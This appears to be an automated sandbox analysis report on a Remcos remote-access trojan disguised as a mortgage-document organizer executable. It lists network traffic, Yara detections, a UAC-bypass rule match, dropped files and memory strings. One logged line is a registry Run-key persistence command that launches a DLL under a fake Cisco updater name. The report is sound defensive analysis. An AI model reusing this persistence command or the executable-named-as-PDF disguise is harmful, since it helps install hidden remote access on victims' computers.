Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49749 version: TLS 1.2

Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2423957132.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 6148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 5652, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\Marys Organizer 2023 Release.zip (copy)

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f

Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.expl.evad.win@37/33@21/12

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_03

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

File created: C:\Users\user\AppData\Local\Temp\build.exe

Jump to behavior

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM Application WHERE status != 'unchanged' AND AppIsCompletelyScanned = 'true';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: SELECT filepath FROM BlackCache ORDER BY atime DESC LIMIT 2000%04d-%02d-%02d %02d:%02d:%02dSELECT filepath, mtime, size, atime FROM WhiteCache ORDER BY atime DESC LIMIT 2000COMMITDELETE FROM WhiteCache WHERE atime < datetime('now', '-%d hour', 'localtime')CREATE TABLE IF NOT EXISTS BlackCache (filepath varchar(300) UNIQUE,atime char(255));CREATE TABLE IF NOT EXISTS WhiteCache (filepath varchar(300) UNIQUE,mtime char(255),atime char(255),size INTEGER(8))BEGIN TRANSACTIONwhitecacheINSERT INTO BlackCache(filepath, atime) VALUES ('%q', datetime('now', 'localtime'))DELETE FROM BlackCache WHERE filepath = '%q'DELETE FROM WhiteCacheDELETE FROM WhiteCache WHERE filepath = '%q' UPDATE WhiteCache SET atime = datetime('now', 'localtime') WHERE filepath = '%q'INSERT INTO WhiteCache(filepath, size, mtime, atime) VALUES ('%q', %lld, '%4d-%02d-%02d %2d:%02d:%02d', datetime('now', 'localtime'))list<T> too long
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM Process WHERE LastSentTime<=?6;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM ApplicationInstallLocation WHERE AppId=?1 AND InstallLocation=?2;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO Application (AppId,Stale,Name,Version,ModifiedVersion,InstallSource,Publisher,ARPRegistryKey,Architecture,IsStandalone,AppIsCompletelyScanned,MSIfile,Status,LastUpdated,LastSentTime) VALUES ((SELECT AppId FROM Application WHERE Name=?2 AND Version=?3 AND Architecture=?10),?1, ?2, ?3, ?4, ?5, ?6, ?7,?10,?35,?50,?54,COALESCE((SELECT Status FROM Application WHERE Name=?2 AND Version=?3 AND Architecture=?10 AND Status != 'deleted'),?55),?70,COALESCE((SELECT LastSentTime FROM Application WHERE Name=?2 AND Version=?3 AND Architecture=?10),?71));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Stale='true' WHERE Path BETWEEN (?1 \|\| '\') AND (?1 \|\| 'hex(7F)');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO ScanHistory (ScanId, AppCtrlIniSHA256, SectionName, LastDiscoverySourceScanned, LastLocationScanned, ScanStatus, ScanActive, LastUpdated) VALUES ((SELECT ScanId FROM ScanHistory WHERE AppCtrlIniSHA256=?10 AND SectionName=?11),?10, ?11,?15, ?20, ?21, ?22,?70);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM ScanHistory WHERE AppCtrlIniSHA256=?10 AND ScanStatus='interrupted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO ApplicationFile (AppId, FileId) SELECT DISTINCT ?1, FileId FROM File f, (SELECT ApplicationInstallLocation.InstallLocation, ApplicationInstallLocation.IsStandalone, Application.InstallSource, Application.Name, Application.Version, Application.ModifiedVersion, Application.MSIfile FROM ApplicationInstallLocation INNER JOIN Application ON ApplicationInstallLocation.AppId = Application.AppId WHERE Application.AppId=?1 AND Application.Status != 'deleted' AND Application.IsStandalone = 'false') a WHERE (a.IsStandalone = 'false') AND (upper(f.Path) BETWEEN (upper(a.InstallLocation) \|\| '\ ') AND (upper(a.InstallLocation) \|\| 'hex(7F)')) AND ((a.MSIfile=f.MSIfile) OR ((f.ProductVersion BETWEEN a.Version AND (a.Version \|\| 'hex(7F)')) OR (f.ProductVersion BETWEEN a.ModifiedVersion AND (a.ModifiedVersion \|\| 'hex(7F)')))) AND f.IsScriptFile=?4 AND f.IsStandalone='false';
